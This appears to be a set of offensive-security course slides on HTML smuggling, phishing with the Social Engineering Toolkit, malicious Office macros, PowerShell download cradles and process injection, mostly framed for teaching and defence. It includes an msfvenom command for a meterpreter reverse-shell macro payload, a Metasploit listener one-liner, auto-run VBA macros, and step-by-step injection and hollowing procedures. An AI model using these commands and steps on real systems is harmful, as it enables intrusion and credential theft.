HTML Smuggling

Unit - 3
HTML Smuggling

•HTML smuggling is a technique used by downloaders to evade detection and deliver malicious
content by hiding it within HTML code.

•The attacker can embed the malicious payload inside the HTML code and use various encoding
techniques to bypass security measures such as firewalls or antivirus software.

•A real-world example of an HTML smuggling attack is the "HTML_Smokeloader" campaign that

was discovered in 2018. This campaign used HTML smuggling to deliver a banking Trojan to
victims by hiding the malicious payload within the HTML code of a legitimate website.
•To prevent HTML smuggling attacks, organizations can implement various security measures such as web
application firewalls, content filtering, and intrusion detection and prevention systems.

•Additionally, it is important to keep all software and systems up-to-date with the latest security patches to
minimize vulnerabilities that could be exploited by attackers.

•It is also recommended to educate employees on identifying and reporting suspicious emails or websites
that could be used to deliver malware.

•Organizations can also leverage sandboxing technology to isolate and analyze suspicious files, URLs, or
email attachments to detect and prevent HTML smuggling attacks.

•Sandboxing allows security teams to run potentially malicious code in a controlled environment without
exposing the organization's network or systems to any risks.
HTML smuggling overview
How HTML smuggling works
•HTML smuggling uses legitimate features of HTML5 and JavaScript, which are both supported by
all modern browsers, to generate malicious files behind the firewall.

•Specifically, HTML smuggling leverages the HTML5 “download” attribute for anchor tags and the
creation and use of a JavaScript Blob to put together the payload downloaded into an affected device.

•In HTML5, when a user clicks a link, the “download” attribute lets an HTML file automatically
download a file referenced in the “href” tag.

•For example, the code below instructs the browser to download “malicious.docx” from its location
and save it into the device as “safe.docx”:
How HTML smuggling works
•The anchor tag and a file’s “download” attribute also have their equivalents in JavaScript code, as
seen below

•The use of JavaScript Blobs adds to the “smuggling” aspect of the technique. A JavaScript Blob stores
the encoded data of a file, which is then decoded when passed to a JavaScript API that expects a URL.
 Real-world examples of threats using HTML smuggling
•Mekotio campaigns

Threat behavior observed in the Mekotio campaign

Sample email used in a Mekotio campaign. Clicking the link starts the
HTML smuggling technique
Real-world examples of threats using HTML smuggling
•Mekotio campaigns

ZIP file with an obfuscated JavaScript file

Note how the “href” tag references a JavaScript Blob with an
octet/stream type to download the malicious ZIP file.
Social Engineering Toolkit
Social Engineering Attack to gain email access
•Get root access using sudo -i
STEP 1. SETUP PHISHING PAGE
• setoolkit
Social Engineering Toolkit
•To check your device IP address, type: ‘ifconfig’

• STEP 2. HUNTING VICTIMS – Type the ip address in the browser

VBA Macros
•Visual Basic for Applications (VBA) macros are commonly used in Microsoft Office documents to
automate tasks and increase productivity.

•However, VBA macros can also be used offensively by attackers to deliver malware or steal
sensitive information from unsuspecting users.

•Attackers can embed malicious code within VBA macros, which can be triggered when the user
opens the infected document.

•The malicious code can then execute commands on the user's system, download and install malware,
or steal sensitive information such as usernames and passwords.
VBA Macros
• To detect and prevent VBA macro attacks, organizations can implement several security measures. These include

1. Enabling macro security settings: By default, Microsoft Office applications disable macros to prevent malicious code
execution. Users can enable macros only for trusted documents or from trusted sources.

2. Deploying anti-virus software: Anti-virus software can detect, and block known VBA macro malware.

3. User education and awareness: Users should be educated on how to identify and avoid suspicious emails or attachments that
may contain VBA macros.

4. Deploying email security solutions: Email security solutions can detect and block suspicious emails that may contain VBA
macros.

5. Sandboxing VBA macros: Sandboxing can be used to analyze and test VBA macros in a controlled environment to identify
potential threats.

6. Blocking macros from the internet: Organizations can block macros from the internet to prevent users from downloading and
opening infected documents.
How to load malicious payload using Macros
To begin, we first need to create our VBScript payload.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e

x86/shikata_ga_nai -f vba-exe.

The first part of the script is created as a macro and the second part is appended into the document text itself. You will
need to transfer this script over to a machine with Windows and Office installed and perform the following

Word/Excel 2003: Tools -> Macros -> Visual Basic Editor

Word/Excel 2007: View Macros -> then place a name like "moo" and select "create".
Before we send off our malicious document to our victim, we first need to set up our Metasploit listener
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101;
set LPORT 8080; run; exit -y"

Now we can test out the document by opening it up and check back to where we have our Metasploit
exploit/multi/handler listener:
Message Box Display - Macros
Sub Doccument_Open()
MsgBoxDisplay
End Sub
Sub AutoOpen()
MsgBoxDisplay
End Sub
Sub MsgBoxDisplay()
Dim msglong As Long 'Variable Declaration
msglong = 1
If msglong > 5 Then
MsgBox ("True")
Else
For Counter = 1 To 2 ' For loop to print the message box two times
MsgBox (" Macros Executed Successfully")
MsgBox (" Welcome")
Next Counter
End If
End Sub
Message Box Display - Macros
Open a program in VBA Macros
Sub AutoOpen()
ExecuteCommand
End Sub
Sub ExecuteCommand()
Dim cmd As String
Dim shell As Object
Set shell = CreateObject("WScript.Shell")
shell.Run "notepad.exe"
Set shell = Nothing
End Sub
Open a program in VBA Macros
Shortcut to open the MSapps
Developer tab – file -> options -> customize Ribbon -> Main Tabs -> select Developer
Shortcut to open the MSapps
Sub OpenMSApps()
Dim i As Integer
i = InputBox("Enter the application you wish to open - use 0 for calculator, 1 for word, 2 for
powerpoint, 3 for outlook, 4 for access")
Application.ActivateMicrosoftApp Index:=i
End Sub
Shortcut to open the MSapps

https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplicati
Workbook_Open_Close
Sub Workbook_Open_Close()
Workbooks.Open Filename:="D:\Demobook.xlsx"
Workbooks("Demobook.xlsx").Sheets(1).Range("a1:a25") = "Offensive Security"
Workbooks("Demobook.xlsx").Save
Workbooks("Demobook.xlsx").Close

End Sub
Shellcode Runners in Offensive Security
Shellcode runners, also referred to as payload execution engines, are vital components in offensive security testing.

In the context of offensive security testing, shellcode runners serve as the means to execute arbitrary code, typically
within a targeted system or application.

They act as catalysts, facilitating the process of exploiting vulnerabilities in order to gain unauthorized access,
escalate privileges, or achieve other objectives that may compromise the security of a system.

The concept of shellcode runners revolves around their ability to interpret and execute specific instructions, known as
shellcode or payload.

Shellcode is a series of low level, often platform-specific instructions written in machine code or assembly language.

It is designed to be injected into a running process or system, bypassing conventional security measures and
granting the attacker control over the targeted system.
Shellcode Runners in Offensive Security
By utilizing shellcode runners in offensive security testing, security researchers and penetration testers can:

1. Identify weaknesses in a system's security by simulating real-world attacks.

2. Develop countermeasures and mitigation strategies by understanding the potential impact of an exploit.

3. Improve the overall security posture of a system by identifying and remediating vulnerabilities before they are
exploited by malicious actors.
PowerShell Download Cradle
A PowerShell download cradle is a technique that allows users to download and execute code on a target system
using PowerShell scripts.

By utilizing built-in functions and cmdlets, engineers can retrieve remote resources, such as files or scripts, and
execute them directly in-memory.

This avoids writing to disk and reduces the chances of triggering security mechanisms like antivirus
software.

https://locall.host/what-is-a-powershell-download-cradle/?expand_a
Download Cradle vs. Traditional File Transfer Methods

Traditional file transfer methods like FTP or HTTP usually require writing a file to disk, opening
opportunities for detection by security software.

Download cradles, on the other hand, allow code execution in-memory, without touching the
filesystem.

This makes them indispensable when trying to minimize exposure from security monitoring tools.
Common PowerShell Cmdlets
`Invoke-WebRequest`: Retrieves content from a web page.

`Invoke-Expression`: Executes a specified string as a PowerShell command.

`System.Net.WebClient`: A .NET class that enables interaction with web servers.

IEX` is an alias for `Invoke-Expression`. The `Net.WebClient` object retrieves the content of
‘http://example.com/myscript.ps1’, and `Invoke-Expression` executes it in-memory.
Process Injection
•Process injection is a technique used to inject malicious code into running processes. Because it
evades detection techniques, innocent processes run the malicious injected code, unknowingly
infecting the systems.

•First, attackers breach the perimeter of an organization. This includes techniques such as phishing,
password guessing and exploiting out-of-date or vulnerable software.

•The second phase of an attack involves moving around a target's network to escalate privileges and
steal or encrypt sensitive data.
Dll Injection (dynamic link libraries)
•The malicious process injects the path to the malicious DLL in the legitimate process address
space. The Injector process then invokes the DLL via a remote thread execution.

Drawbacks

•The malicious DLL needs to be saved on disk space.

•The malicious DLL will be visible in the import table.

Steps for performing the attack
•Locate the targeted process and create a handle to it.

•Allocate the space for injecting the path of the DLL file.

•Write the path of the DLL into the allocated space.

•Execute the DLL by creating a remote thread.

Reflective DLL injection
•Refers to loading a DLL from memory rather than from disk.

•Windows does not have a LoadLibrary function that supports this.

•To achieve the functionality, adversaries must write their own function, omitting some of the things
Windows normally does, such as registering the DLL as a loaded module in the process, potentially
bypassing DLL load monitoring.
Steps for performing the attack
• Open target process and allocate memory large enough for the DLL.

• Copy the DLL into the allocated memory space.

• Calculate the memory offset within the DLL to the export used for doing reflective loading.

• Call CreateRemoteThread (or an equivalent undocumented API function like RtlCreateUserThread) to start
execution in the remote process, using the offset address of the reflective loader function as the entry point.

• The reflective loader function finds the Process Environment Block of the target process using the appropriate
CPU register and uses that to find the address in memory of kernel32.dll and any other required libraries.

• Parse the exports directory of kernel32 to find the memory addresses of required API functions such
as LoadLibraryA, GetProcAddress, and VirtualAlloc.

• Use these functions to then load the DLL (itself) properly into memory and call its entry point, DllMain.
Portable Executable Loading (Injection)
•Portable Executable injection and loading does not require the DLL (or executable) to be stored on
disk.

•To load and execute the injected PE, malware needs to calculate the new base address of the injected
PE to properly change its fixed addresses.

•To accomplish this, malware will traverse its relocation table inside the target process to compute the
correct addresses.
Steps for performing the attack
• Using the PE header of the current image, get its base address and size.

• In the processes injecting the PE, allocate memory for the image using VirtualAlloc.

• Copy the image into the locally allocated memory using memcpy.

• In the target process, allocate memory for the injected image with VirtualAllocEx.

• In the process injecting the PE, find the relocation table offset from loaded in local memory.

• Fix all the absolute addresses of the image to work with the address returned by VirtualAllocEx, by traversing the relocation table
from step 5.

• Inject (copy) the image from the local process to the target process’ allocated memory using WriteProcessMemory.

• Find the correct address of the exported function to be executed inside the target process:

• a) Subtract the function’s address in the injecting process from the base address

• B) In the target process, add the result from (b) to the address of the allocated memory

• 9. Execute the injected by creating a new thread with CreateRemoteThread , passing it the remote address of the function from step 8.
Process Hollowing
•A legitimate process is started by malware in a suspended state.

•Then, while in a suspended state, the target process memory is unmapped (hollowed)
to contain the malicious payload.
Steps for performing the attack
•Start a new process in a suspended state by calling CreateProcess with the CreationFlags
parameter set to CREATE_SUSPENDED=0x00000004.

•Unmap the memory of the target process

using ZwUnmapViewOfSection or NtUnmapViewOfSection.

•Allocate space in memory for the malicious payload using VirtualAllocEx.

•Inject the payload in the allocated memory region with WriteProcessMemory.

•Change the execution point of the targeted process to start from the correct point in the injected
payload by calling GetThreadContext.

•Resume targeted process execution by calling ResumeThread.